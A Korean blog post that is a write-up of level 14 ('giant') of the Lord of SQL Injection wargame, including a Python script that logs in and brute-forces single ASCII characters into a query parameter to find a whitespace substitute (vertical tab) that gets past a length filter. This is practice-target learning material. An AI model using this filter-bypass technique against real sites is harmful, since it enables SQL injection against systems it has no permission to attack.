Dork's port

LOS 14번 GIANT 본문

Lord Of Sql injection

LOS 14번 GIANT

Dork94 2019. 1. 12. 07:15

이번 문제는 띠용...입니다.


볼게요!



특이하게 from뒤에 저희가 shit에 준 값이 붙는군요.


그리고 그건 길이가 1이넘지 않아야합니다.


우리는 개행을 할 수 있는 뭔가를 찾아야하고, 찾을겁니다.


그래서 ASCII코드표를 보려했으나 귀찮음이 발동해서..


어차피 ASCII코드중 하나이겠지 싶어 brote force를 돌려봤습니다 하하하하하


from bs4 import BeautifulSoup
import requests

def login(id, pw):
    url = 'https://los.rubiya.kr/?login'
    data = {'id': id, 'pw': pw}
    res = requests.post(url, data=data)

    if res.status_code != 200:
        print('Please check server status.')
        exit(1)
    if res.text.find('fail') != -1:
        print('Please check your id or pw')
        exit(1)

    print('Login Success!')
    return res.cookies.get_dict()

url = 'https://los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit='

cookie = login('id','passwd')
for i in range(0,127):
    res = requests.get(url+chr(i), cookies=cookie)
    soup = BeautifulSoup(res.text, 'html.parser')
    h2s = soup.find_all('h2')
    if h2s:
        print('Clear Secret is ASCII CODE {0}'.format(i))
        break

성공이네요 :) 비밀은 ASCII CODE 11번에 있는 VT였네요! 

저작자표시 비영리 변경금지 (새창열림)

'Lord Of Sql injection' 카테고리의 다른 글

LOS 16번 ZOMEBIE_ASSASSINE  (0) 2019.01.12
LOS 15번 ASSASSIN  (0) 2019.01.12
LOS 13번 BUGBEAR  (0) 2019.01.12
LOS 12번 DARKKNIGHT  (0) 2019.01.12
LOS 11번 GOLEM  (0) 2019.01.12
'Lord Of Sql injection' Related Articles more
Comments